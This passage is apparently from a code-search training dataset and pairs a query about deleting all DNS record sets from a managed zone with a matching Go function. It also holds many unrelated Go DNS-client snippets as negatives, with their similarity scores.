TxtRecords\")\n\t\t\t}\n\t\t\ttxtRecordList[txtRecordIndex] = txtRecord\n\t\t}\n\t\tzonesSRV.TxtRecords = txtRecordList\n\t} else {\n\t\tzonesSRV.TxtRecords = nil\n\t}\n\n\t// No error\n\treturn nil\n}", "func (api *API) ImportDNSRecords(ctx context.Context, rc *ResourceContainer, params ImportDNSRecordsParams) error {\n\tif rc.Level != ZoneRouteLevel {\n\t\treturn ErrRequiredZoneLevelResourceContainer\n\t}\n\n\tif rc.Identifier == \"\" {\n\t\treturn ErrMissingZoneID\n\t}\n\n\tif params.BINDContents == \"\" {\n\t\treturn ErrMissingBINDContents\n\t}\n\n\tsanitisedBindData := sanitiseBINDFileInput(params.BINDContents)\n\tnonProxiedRecords := removeProxiedRecords(sanitisedBindData)\n\tproxiedOnlyRecords := extractProxiedRecords(sanitisedBindData)\n\n\tnonProxiedRecordPayload := []byte(fmt.Sprintf(nonProxiedRecordImportTemplate, nonProxiedRecords))\n\tnonProxiedReqBody := bytes.NewReader(nonProxiedRecordPayload)\n\n\turi := fmt.Sprintf(\"/zones/%s/dns_records/import\", rc.Identifier)\n\tmultipartUploadHeaders := http.Header{\n\t\t\"Content-Type\": {\"multipart/form-data; boundary=------------------------BOUNDARY\"},\n\t}\n\n\t_, err := api.makeRequestContextWithHeaders(ctx, http.MethodPost, uri, nonProxiedReqBody, multipartUploadHeaders)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tproxiedRecordPayload := []byte(fmt.Sprintf(proxiedRecordImportTemplate, proxiedOnlyRecords))\n\tproxiedReqBody := bytes.NewReader(proxiedRecordPayload)\n\n\t_, err = api.makeRequestContextWithHeaders(ctx, http.MethodPost, uri, proxiedReqBody, multipartUploadHeaders)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (ms *Sales) setRecords() (err error) {\n\n\tsales, err := ms.DB.GetMonthlySales(ms.dates)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\thst := (float64(ms.cfg.HST)/100 + 1)\n\tstationMap, err := ms.DB.GetStationMap()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfor _, s := range sales {\n\n\t\temployee, err := ms.DB.GetEmployee(s.Attendant.ID)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// set HST\n\t\tfuelSalesNoHST := s.Summary.FuelDollar / hst\n\t\tfuelSalesHST := s.Summary.FuelDollar - fuelSalesNoHST\n\n\t\trecord := &model.MonthlySales{\n\t\t\tBankAmex: model.SetFloat(s.CreditCard.Amex),\n\t\t\tBankDiscover: model.SetFloat(s.CreditCard.Discover),\n\t\t\tBankGales: model.SetFloat(s.CreditCard.Gales),\n\t\t\tBankMC: model.SetFloat(s.CreditCard.MC),\n\t\t\tBankVisa: model.SetFloat(s.CreditCard.Visa),\n\t\t\tBobsGiftCertificates: model.SetFloat(s.OtherNonFuelBobs.BobsGiftCerts),\n\t\t\tBobsNonFuelAdjustments: model.SetFloat(s.Summary.BobsFuelAdj),\n\t\t\tBobsSales: model.SetFloat(s.OtherNonFuel.Bobs),\n\t\t\tCashBills: model.SetFloat(s.Cash.Bills),\n\t\t\tCashDebit: model.SetFloat(s.Cash.Debit),\n\t\t\tCashDieselDiscount: model.SetFloat(s.Cash.DieselDiscount),\n\t\t\tCashDriveOffNSF: model.SetFloat(s.Cash.DriveOffNSF),\n\t\t\tCashGiftCertRedeem: model.SetFloat(s.Cash.GiftCertRedeem),\n\t\t\tCashLotteryPayout: model.SetFloat(s.Cash.LotteryPayout),\n\t\t\tCashOSAdjusted: model.SetFloat(s.Cash.OSAdjusted),\n\t\t\tCashOther: model.SetFloat(s.Cash.Other),\n\t\t\tCashPayout: model.SetFloat(s.Cash.Payout),\n\t\t\tCashWriteOff: model.SetFloat(s.Cash.WriteOff),\n\t\t\tEmployee: employee,\n\t\t\tFuelSales: fuelSalesNoHST,\n\t\t\tFuelSalesHST: fuelSalesHST,\n\t\t\tFuelSalesOther: model.SetFloat(s.Summary.OtherFuelDollar),\n\t\t\tFuelSalesTotal: model.SetFloat(s.Summary.FuelDollar),\n\t\t\tGiftCertificates: model.SetFloat(s.OtherNonFuel.GiftCerts),\n\t\t\tNonFuelTotal: model.SetFloat(s.Summary.TotalNonFuel),\n\t\t\tRecordNumber: s.RecordNum,\n\t\t\tShiftOvershort: model.SetFloat(s.Overshort.Amount),\n\t\t\tStationID: s.StationID,\n\t\t\tStationName: stationMap[s.StationID].Name,\n\t\t}\n\t\tms.Sales = append(ms.Sales, record)\n\t}\n\n\treturn err\n}", "func Set() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"set\",\n\t\tShort: \"Sets DNS record to current IP address.\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\trecordName, _ := cmd.Flags().GetString(\"record\")\n\t\t\tzoneName, _ := cmd.Flags().GetString(\"zone\")\n\t\t\tDNSProvider, _ := cmd.Flags().GetString(\"dns-provider\")\n\t\t\tIPProviderName, _ := cmd.Flags().GetString(\"ip-provider\")\n\t\t\tinterval, _ := cmd.Flags().GetInt(\"interval\")\n\t\t\tdaemon, _ := cmd.Flags().GetBool(\"daemon\")\n\n\t\t\tctx := context.Background()\n\n\t\t\tIPProvider, err := ip.GetProvider(IPProviderName)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tapi, err := provider.GetProvider(DNSProvider)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tipAddress := ip.IP{Client: &http.Client{}, Provider: IPProvider}\n\n\t\t\tif daemon {\n\t\t\t\terrChan := make(chan error)\n\t\t\t\tgo func(\n\t\t\t\t\tctx context.Context,\n\t\t\t\t\trecordName,\n\t\t\t\t\tzoneName string,\n\t\t\t\t\tipAddress ip.IP,\n\t\t\t\t\tapi provider.API,\n\t\t\t\t) {\n\t\t\t\t\tfor {\n\t\t\t\t\t\terr = setRecord(ctx, recordName, zoneName, ipAddress, api)\n\t\t\t\t\t\tif err != nil {\n\t\t\t\t\t\t\terrChan <- err\n\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\ttime.Sleep(time.Duration(interval) * time.Minute)\n\t\t\t\t\t}\n\t\t\t\t}(ctx, recordName, zoneName, ipAddress, api)\n\n\t\t\t\treturn <-errChan\n\t\t\t}\n\n\t\t\terr = setRecord(ctx, recordName, zoneName, ipAddress, api)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\treturn nil\n\t\t},\n\t}\n\n\tsetupAddCommand(cmd)\n\n\treturn cmd\n}", "func (api *powerdnsProvider) GetZoneRecords(domain string) (models.Records, error) {\n\tzone, err := api.client.Zones().GetZone(context.Background(), api.ServerName, domain)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcurRecords := models.Records{}\n\t// loop over grouped records by type, called RRSet\n\tfor _, rrset := range zone.ResourceRecordSets {\n\t\tif rrset.Type == \"SOA\" {\n\t\t\tcontinue\n\t\t}\n\t\t// loop over single records of this group and create records\n\t\tfor _, pdnsRecord := range rrset.Records {\n\t\t\tr, err := toRecordConfig(domain, pdnsRecord, rrset.TTL, rrset.Name, rrset.Type)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tcurRecords = append(curRecords, r)\n\t\t}\n\t}\n\n\treturn curRecords, nil\n}", "func (client DnsClient) getRRSet(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodGet, \"/zones/{zoneNameOrId}/records/{domain}/{rtype}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response GetRRSetResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (s *FastDNSv2Service) GetChangeListRecordSets(ctx context.Context, zone string, opt *ChangeListOptions) (*ChangeListRecords, *Response, error) {\n\tu := fmt.Sprintf(\"/config-dns/v2/changelists/%v/recordsets\", zone)\n\tu, err := addOptions(u, opt)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\treq, err := s.client.NewRequest(\"GET\", u, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tc := new(ChangeListRecords)\n\tresp, err := s.client.Do(ctx, req, &c)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn c, resp, nil\n\n}", "func ExampleAvailabilitySetsClient_Update_availabilitySetUpdateMaximumSetGen() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armcompute.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tres, err := clientFactory.NewAvailabilitySetsClient().Update(ctx, \"rgcompute\", \"aaaaaaaaaaaaaaaaaaa\", armcompute.AvailabilitySetUpdate{\n\t\tTags: map[string]*string{\n\t\t\t\"key2574\": to.Ptr(\"aaaaaaaa\"),\n\t\t},\n\t\tProperties: &armcompute.AvailabilitySetProperties{\n\t\t\tPlatformFaultDomainCount: to.Ptr[int32](2),\n\t\t\tPlatformUpdateDomainCount: to.Ptr[int32](20),\n\t\t\tProximityPlacementGroup: &armcompute.SubResource{\n\t\t\t\tID: to.Ptr(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/availabilitySets/{availabilitySetName}\"),\n\t\t\t},\n\t\t\tVirtualMachines: []*armcompute.SubResource{\n\t\t\t\t{\n\t\t\t\t\tID: to.Ptr(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/availabilitySets/{availabilitySetName}\"),\n\t\t\t\t}},\n\t\t},\n\t\tSKU: &armcompute.SKU{\n\t\t\tName: to.Ptr(\"DSv3-Type1\"),\n\t\t\tCapacity: to.Ptr[int64](7),\n\t\t\tTier: to.Ptr(\"aaa\"),\n\t\t},\n\t}, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\t// You could use response here. We use blank identifier for just demo purposes.\n\t_ = res\n\t// If the HTTP response code is 200 as defined in example definition, your response structure would look as follows. Please pay attention that all the values in the output are fake values for just demo purposes.\n\t// res.AvailabilitySet = armcompute.AvailabilitySet{\n\t// \tName: to.Ptr(\"myAvailabilitySet\"),\n\t// \tType: to.Ptr(\"Microsoft.Compute/availabilitySets\"),\n\t// \tID: to.Ptr(\"/subscriptions/{subscription-id}/resourceGroups/myResourceGroup/providers/Microsoft.Compute/availabilitySets/myAvailabilitySet\"),\n\t// \tLocation: to.Ptr(\"westus\"),\n\t// \tTags: map[string]*string{\n\t// \t\t\"key2505\": to.Ptr(\"aa\"),\n\t// \t\t\"key9626\": to.Ptr(\"aaaaaaaaaaaaaaaaaaaa\"),\n\t// \t},\n\t// \tProperties: &armcompute.AvailabilitySetProperties{\n\t// \t\tPlatformFaultDomainCount: to.Ptr[int32](2),\n\t// \t\tPlatformUpdateDomainCount: to.Ptr[int32](20),\n\t// \t\tProximityPlacementGroup: &armcompute.SubResource{\n\t// \t\t\tID: to.Ptr(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/availabilitySets/{availabilitySetName}\"),\n\t// \t\t},\n\t// \t\tStatuses: []*armcompute.InstanceViewStatus{\n\t// \t\t\t{\n\t// \t\t\t\tCode: to.Ptr(\"aaaaaaaaaaaaaaaaaaaaaaa\"),\n\t// \t\t\t\tDisplayStatus: to.Ptr(\"aaaaaa\"),\n\t// \t\t\t\tLevel: to.Ptr(armcompute.StatusLevelTypesInfo),\n\t// \t\t\t\tMessage: to.Ptr(\"a\"),\n\t// \t\t\t\tTime: to.Ptr(func() time.Time { t, _ := time.Parse(time.RFC3339Nano, \"2021-11-30T12:58:26.522Z\"); return t}()),\n\t// \t\t}},\n\t// \t\tVirtualMachines: []*armcompute.SubResource{\n\t// \t\t\t{\n\t// \t\t\t\tID: to.Ptr(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/availabilitySets/{availabilitySetName}\"),\n\t// \t\t}},\n\t// \t},\n\t// \tSKU: &armcompute.SKU{\n\t// \t\tName: to.Ptr(\"Classic\"),\n\t// \t\tCapacity: to.Ptr[int64](29),\n\t// \t\tTier: to.Ptr(\"aaaaaaaaaaaaaa\"),\n\t// \t},\n\t// }\n}", "func (c *AwsClient) UpsertARecord(clusterDomain, DNSName, aliasDNSZoneID, resourceRecordSetName, comment string, targetHealth bool) error {\n\t// look up clusterDomain to get hostedzoneID\n\tlookup := &route53.ListHostedZonesByNameInput{\n\t\tDNSName: aws.String(clusterDomain),\n\t}\n\n\tlistHostedZones, err := c.ListHostedZonesByName(lookup)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// get public hosted zone ID needed to changeResourceRecordSets\n\tvar publicHostedZoneID string\n\tfor _, zone := range listHostedZones.HostedZones {\n\t\tif *zone.Name == clusterDomain {\n\t\t\t// In order to get the publicHostedZoneID we need to get\n\t\t\t// the HostedZone.Id object which is in the form of \"/hostedzone/Z1P3C0HZA40C0N\"\n\t\t\t// Since we only care about the ID number, we take index of the last \"/\" char and parse right\n\t\t\tzoneID := aws.StringValue(zone.Id)\n\t\t\tslashIndex := strings.LastIndex(zoneID, \"/\")\n\t\t\tpublicHostedZoneID = zoneID[slashIndex+1:]\n\t\t\tbreak\n\t\t}\n\t}\n\n\tchange := &route53.ChangeResourceRecordSetsInput{\n\t\tChangeBatch: &route53.ChangeBatch{\n\t\t\tChanges: []*route53.Change{\n\t\t\t\t{\n\t\t\t\t\tAction: aws.String(\"UPSERT\"),\n\t\t\t\t\tResourceRecordSet: &route53.ResourceRecordSet{\n\t\t\t\t\t\tAliasTarget: &route53.AliasTarget{\n\t\t\t\t\t\t\tDNSName: aws.String(DNSName),\n\t\t\t\t\t\t\tEvaluateTargetHealth: aws.Bool(targetHealth),\n\t\t\t\t\t\t\tHostedZoneId: aws.String(aliasDNSZoneID),\n\t\t\t\t\t\t},\n\t\t\t\t\t\tName: aws.String(resourceRecordSetName),\n\t\t\t\t\t\tType: aws.String(\"A\"),\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t\tComment: aws.String(comment),\n\t\t},\n\t\tHostedZoneId: aws.String(publicHostedZoneID),\n\t}\n\n\t_, err = c.ChangeResourceRecordSets(change)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}" ]
[ "0.7518115", "0.6707654", "0.6628259", "0.6497489", "0.61840737", "0.61539745", "0.6116657", "0.6111992", "0.6105293", "0.6021211", "0.5987698", "0.5978222", "0.58855504", "0.58805597", "0.58334905", "0.5816443", "0.5797787", "0.5787811", "0.5784792", "0.5780214", "0.5722433", "0.56983197", "0.5669025", "0.5572592", "0.5570915", "0.555217", "0.5541124", "0.55144626", "0.5513467", "0.5499365", "0.5494379", "0.5494379", "0.5492807", "0.54527533", "0.54503715", "0.54474896", "0.5431863", "0.54309523", "0.53668875", "0.5365129", "0.53609115", "0.53535396", "0.53479624", "0.53283125", "0.5313139", "0.52952886", "0.52708083", "0.5236699", "0.523551", "0.5225388", "0.5222245", "0.5220599", "0.5214883", "0.5146687", "0.51380956", "0.51257324", "0.51238924", "0.5112377", "0.5102321", "0.5102321", "0.51013", "0.50874233", "0.50543964", "0.5047879", "0.5045665", "0.5023723", "0.502345", "0.5015587", "0.49970904", "0.4996087", "0.49934086", "0.49927837", "0.49889052", "0.49770772", "0.49693292", "0.49502406", "0.49498346", "0.49478328", "0.49460346", "0.49403855", "0.49340114", "0.49315947", "0.49312702", "0.49209905", "0.48997265", "0.48865736", "0.48768288", "0.48503092", "0.48492151", "0.48307955", "0.48203048", "0.48133656", "0.4802933", "0.4802469", "0.47911698", "0.47830006", "0.4781415", "0.4773529", "0.47566843", "0.4744329" ]
0.81879765
0
DeleteResourceRecordSets will remove all resource record sets from a managed zone
func (d *DNS) DeleteResourceRecordSets(projectID string, managedZone string) error { var deletions []*v1.ResourceRecordSet resourceRecordSets, err := d.GetResourceRecordSets(projectID, managedZone) if err != nil { return err } d.log.Info("Deleting all records from DNS zone %s:", managedZone) for _, resourceRecordSet := range resourceRecordSets { if resourceRecordSet.Type == "SOA" || resourceRecordSet.Type == "NS" { continue } deletions = append(deletions, resourceRecordSet) d.log.ListItem("%s %s", resourceRecordSet.Type, resourceRecordSet.Name) } change := &v1.Change{ Deletions: deletions, } if err := d.executeChange(projectID, managedZone, change); err != nil { return err } return nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (s *Synk) deleteResourceSets(ctx context.Context, name string, version int32) error {\n\tc := s.client.Resource(resourceSetGVR)\n\n\tlist, err := c.List(ctx, metav1.ListOptions{})\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"list existing resources\")\n\t}\n\tfor _, r := range list.Items {\n\t\tn, v, ok := decodeResourceSetName(r.GetName())\n\t\tif !ok || n != name || v >= version {\n\t\t\tcontinue\n\t\t}\n\t\t// TODO: should we possibly opt for foreground deletion here so\n\t\t// we only return after all dependents have been deleted as well?\n\t\t// kubectl doesn't allow to opt into foreground deletion in general but\n\t\t// here it would likely bring us closer to the apply --prune semantics.\n\t\tif err := c.Delete(ctx, r.GetName(), metav1.DeleteOptions{}); err != nil {\n\t\t\treturn errors.Wrapf(err, \"delete ResourceSet %q\", r.GetName())\n\t\t}\n\t}\n\treturn nil\n}", "func (d *DNS) SetResourceRecordSets(projectID string, managedZone string, records []*v1.ResourceRecordSet) error {\n\tvar deletions []*v1.ResourceRecordSet\n\tvar additions []*v1.ResourceRecordSet\n\tvar change *v1.Change\n\tlogItems := []string{}\n\tfor _, record := range records {\n\t\texisting, err := d.GetResourceRecordSet(projectID, managedZone, record.Name)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"Error trying to get existing resource record set: %s\", err)\n\t\t}\n\t\taction := \"creating\"\n\t\tif existing != nil {\n\t\t\tdeletions = append(deletions, existing)\n\t\t\taction = \"recreating\"\n\t\t}\n\t\tlogItems = append(logItems, fmt.Sprintf(\"====> %s %s => %s %s\", action, record.Name, record.Type, strings.Join(record.Rrdatas, \",\")))\n\t\tadditions = append(additions, record)\n\t}\n\td.log.Info(\"Ensuring the DNS zone %s has the following records:\", managedZone)\n\tfor _, item := range logItems {\n\t\td.log.ListItem(item)\n\t}\n\tif len(deletions) > 0 {\n\t\tchange = &v1.Change{\n\t\t\tDeletions: deletions,\n\t\t}\n\t\tif err := d.executeChange(projectID, managedZone, change); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tchange = &v1.Change{\n\t\tAdditions: additions,\n\t}\n\tif err := d.executeChange(projectID, managedZone, change); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (s *cloudDNSService) getResourceRecordSets(dnsZone string) ([]*dns.ResourceRecordSet, error) {\n\ttimer := pkg.NewTimer(prometheus.ObserverFunc(func(v float64) {\n\t\trequestRecordsTimeSummary.WithLabelValues(dnsZone).Observe(v)\n\t}))\n\tdefer timer.ObserveDuration()\n\n\tpageToken := \"\"\n\n\tresourceRecordSets := make([]*dns.ResourceRecordSet, 0, 16)\n\tfor {\n\t\treq := s.service.ResourceRecordSets.List(s.project, dnsZone)\n\t\tif pageToken != \"\" {\n\t\t\treq.PageToken(pageToken)\n\t\t}\n\t\tresp, err := req.Do()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"[Cloud DNS] Error getting DNS resourceRecordSets from zone %s: %v\", dnsZone, err)\n\t\t}\n\t\tfor _, r := range resp.Rrsets {\n\t\t\tresourceRecordSets = append(resourceRecordSets, r)\n\t\t}\n\t\tif resp.NextPageToken == \"\" {\n\t\t\tbreak\n\t\t}\n\t\tpageToken = resp.NextPageToken\n\t}\n\treturn resourceRecordSets, nil\n}", "func (p *Provider) DeleteRecords(ctx context.Context, zone string, records []libdns.Record) ([]libdns.Record, error) {\n\tp.mutex.Lock()\n\tdefer p.mutex.Unlock()\n\n\tclient := &http.Client{}\n\n\tvar deletedRecords []libdns.Record\n\n\tfor _, record := range records {\n\t\treq, err := http.NewRequest(http.MethodDelete, fmt.Sprintf(\"https://api.leaseweb.com/hosting/v2/domains/%s/resourceRecordSets/%s/%s\", zone, record.Name, record.Type), nil)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treq.Header.Add(LeasewebApiKeyHeader, p.APIKey)\n\n\t\tres, err := client.Do(req)\n\t\tdefer res.Body.Close()\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif res.StatusCode < 200 || res.StatusCode > 299 {\n\t\t\treturn nil, fmt.Errorf(\"Received StatusCode %d from Leaseweb API\", res.StatusCode)\n\t\t}\n\n\t\tdeletedRecords = append(deletedRecords, record)\n\t}\n\n\treturn deletedRecords, nil\n}", "func (ac *azureClient) DeleteRecordSet(ctx context.Context, resourceGroupName string, privateZoneName string, recordType privatedns.RecordType, name string) error {\n\tctx, _, done := tele.StartSpanWithLogger(ctx, \"privatedns.AzureClient.DeleteRecordSet\")\n\tdefer done()\n\n\t_, err := ac.recordsets.Delete(ctx, resourceGroupName, privateZoneName, recordType, name, \"\")\n\treturn err\n}", "func (d *DNS) GetResourceRecordSets(projectID string, managedZone string) ([]*v1.ResourceRecordSet, error) {\n\tctx := context.Background()\n\trrsService := v1.NewResourceRecordSetsService(d.V1)\n\trrsListCall := rrsService.List(projectID, managedZone).Context(ctx)\n\trrsList, err := d.Calls.ResourceRecordSetsList.Do(rrsListCall)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn rrsList.Rrsets, nil\n}", "func testAccCheckDnsRecordSetDestroyProducerFramework(t *testing.T) func(s *terraform.State) error {\n\n\treturn func(s *terraform.State) error {\n\t\tfor name, rs := range s.RootModule().Resources {\n\t\t\tif rs.Type != \"google_dns_record_set\" {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif strings.HasPrefix(name, \"data.\") {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tp := acctest.GetFwTestProvider(t)\n\n\t\t\turl, err := acctest.ReplaceVarsForFrameworkTest(&p.FrameworkProvider.FrameworkProviderConfig, rs, \"{{DNSBasePath}}projects/{{project}}/managedZones/{{managed_zone}}/rrsets/{{name}}/{{type}}\")\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tbillingProject := \"\"\n\n\t\t\tif !p.BillingProject.IsNull() && p.BillingProject.String() != \"\" {\n\t\t\t\tbillingProject = p.BillingProject.String()\n\t\t\t}\n\n\t\t\t_, diags := fwtransport.SendFrameworkRequest(&p.FrameworkProvider.FrameworkProviderConfig, \"GET\", billingProject, url, p.UserAgent, nil)\n\t\t\tif !diags.HasError() {\n\t\t\t\treturn fmt.Errorf(\"DNSResourceDnsRecordSet still exists at %s\", url)\n\t\t\t}\n\t\t}\n\n\t\treturn nil\n\t}\n}", "func (client DnsClient) deleteRRSet(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodDelete, \"/zones/{zoneNameOrId}/records/{domain}/{rtype}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response DeleteRRSetResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (p *AWSProvider) DeleteRecords(zone string, endpoints []*endpoint.Endpoint) error {\n\treturn p.submitChanges(zone, newChanges(route53.ChangeActionDelete, endpoints))\n}", "func (r Dns_Domain_ResourceRecord) DeleteObjects(templateObjects []datatypes.Dns_Domain_ResourceRecord) (resp bool, err error) {\n\tparams := []interface{}{\n\t\ttemplateObjects,\n\t}\n\terr = r.Session.DoRequest(\"SoftLayer_Dns_Domain_ResourceRecord\", \"deleteObjects\", params, &r.Options, &resp)\n\treturn\n}", "func (s *FastDNSv2Service) DeleteRecordSet(ctx context.Context, opt *RecordSetOptions) (*Response, error) {\n\tu := fmt.Sprintf(\"/config-dns/v2/zones/%v/names/%v/types/%v\", opt.Zone, opt.Name, opt.Type)\n\treq, err := s.client.NewRequest(\"DELETE\", u, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn s.client.Do(ctx, req, nil)\n}", "func (p *Provider) DeleteRecords(ctx context.Context, zone string, records []libdns.Record) ([]libdns.Record, error) {\n\t// delete flow is not implemented by acme-dns yet: https://github.com/joohoi/acme-dns/search?q=delete&type=issues\n\treturn nil, nil\n}", "func (s *ResourceRecordSetServer) DeleteDnsResourceRecordSet(ctx context.Context, request *dnspb.DeleteDnsResourceRecordSetRequest) (*emptypb.Empty, error) {\n\n\tcl, err := createConfigResourceRecordSet(ctx, request.ServiceAccountFile)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &emptypb.Empty{}, cl.DeleteResourceRecordSet(ctx, ProtoToResourceRecordSet(request.GetResource()))\n\n}", "func (r Dns_Domain_ResourceRecord_SrvType) DeleteObjects(templateObjects []datatypes.Dns_Domain_ResourceRecord_SrvType) (resp bool, err error) {\n\tparams := []interface{}{\n\t\ttemplateObjects,\n\t}\n\terr = r.Session.DoRequest(\"SoftLayer_Dns_Domain_ResourceRecord_SrvType\", \"deleteObjects\", params, &r.Options, &resp)\n\treturn\n}", "func (r Dns_Domain_ResourceRecord_MxType) DeleteObjects(templateObjects []datatypes.Dns_Domain_ResourceRecord_MxType) (resp bool, err error) {\n\tparams := []interface{}{\n\t\ttemplateObjects,\n\t}\n\terr = r.Session.DoRequest(\"SoftLayer_Dns_Domain_ResourceRecord_MxType\", \"deleteObjects\", params, &r.Options, &resp)\n\treturn\n}", "func (c *gcpClient) DeleteAcmeChallengeResourceRecords(reqLogger logr.Logger, cr *certmanv1alpha1.CertificateRequest) error {\n\t// This function is for record clean up. If we are unable to find the records to delete them we silently accept these errors\n\t// without raising an error. If the record was already deleted that's fine.\n\n\t// Make sure that the domain ends with a dot.\n\tbaseDomain := cr.Spec.ACMEDNSDomain\n\tif !strings.HasSuffix(baseDomain, \".\") {\n\t\tbaseDomain = baseDomain + \".\"\n\t}\n\n\t// Calls function to get the hostedzone of the domain of our CertificateRequest\n\tmanagedZone, err := c.searchForManagedZone(baseDomain)\n\tif err != nil {\n\t\treqLogger.Error(err, \"Unable to find appropriate managedzone.\")\n\t\treturn err\n\t}\n\n\tvar change []*dnsv1.ResourceRecordSet\n\t// Get a list of RecordSets from our hostedzone that match our search criteria\n\t// Criteria - record name starts with our acmechallenge prefix, record is a TXT type\n\treq := c.client.ResourceRecordSets.List(c.project, managedZone.Name)\n\tif err := req.Pages(context.Background(), func(page *dnsv1.ResourceRecordSetsListResponse) error {\n\t\tfor _, resourceRecordSet := range page.Rrsets {\n\t\t\tif strings.Contains(resourceRecordSet.Name, cTypes.AcmeChallengeSubDomain) &&\n\t\t\t\tresourceRecordSet.Type == \"TXT\" {\n\t\t\t\tchange = append(change, resourceRecordSet)\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t}); err != nil {\n\t\treturn err\n\t}\n\n\t_, err = c.client.Changes.Create(c.project, managedZone.Name, &dnsv1.Change{\n\t\tDeletions: change,\n\t}).Do()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func listAllRecordSets(r53 *route53.Route53, id string) (rrsets []*route53.ResourceRecordSet, err error) {\n\treq := route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: &id,\n\t}\n\n\tfor {\n\t\tvar resp *route53.ListResourceRecordSetsOutput\n\t\tresp, err = r53.ListResourceRecordSets(&req)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\trrsets = append(rrsets, resp.ResourceRecordSets...)\n\t\tif *resp.IsTruncated {\n\t\t\treq.StartRecordName = resp.NextRecordName\n\t\t\treq.StartRecordType = resp.NextRecordType\n\t\t\treq.StartRecordIdentifier = resp.NextRecordIdentifier\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// unescape wildcards\n\t//for _, rrset := range rrsets {\n\t//\trrset.Name = aws.String(unescaper.Replace(*rrset.Name))\n\t//}\n\n\treturn\n}", "func DelAllResources(nsId string, resourceType string, forceFlag string) error {\n\n\terr := common.CheckString(nsId)\n\tif err != nil {\n\t\tcommon.CBLog.Error(err)\n\t\treturn err\n\t}\n\n\tresourceIdList, err := ListResourceId(nsId, resourceType)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif len(resourceIdList) == 0 {\n\t\treturn nil\n\t}\n\n\tfor _, v := range resourceIdList {\n\t\terr := DelResource(nsId, resourceType, v, forceFlag)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func (m *MockClient) ListResourceRecordSets(input *route53.ListResourceRecordSetsInput) (*route53.ListResourceRecordSetsOutput, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"ListResourceRecordSets\", input)\n\tret0, _ := ret[0].(*route53.ListResourceRecordSetsOutput)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (s *SQLiteStore) 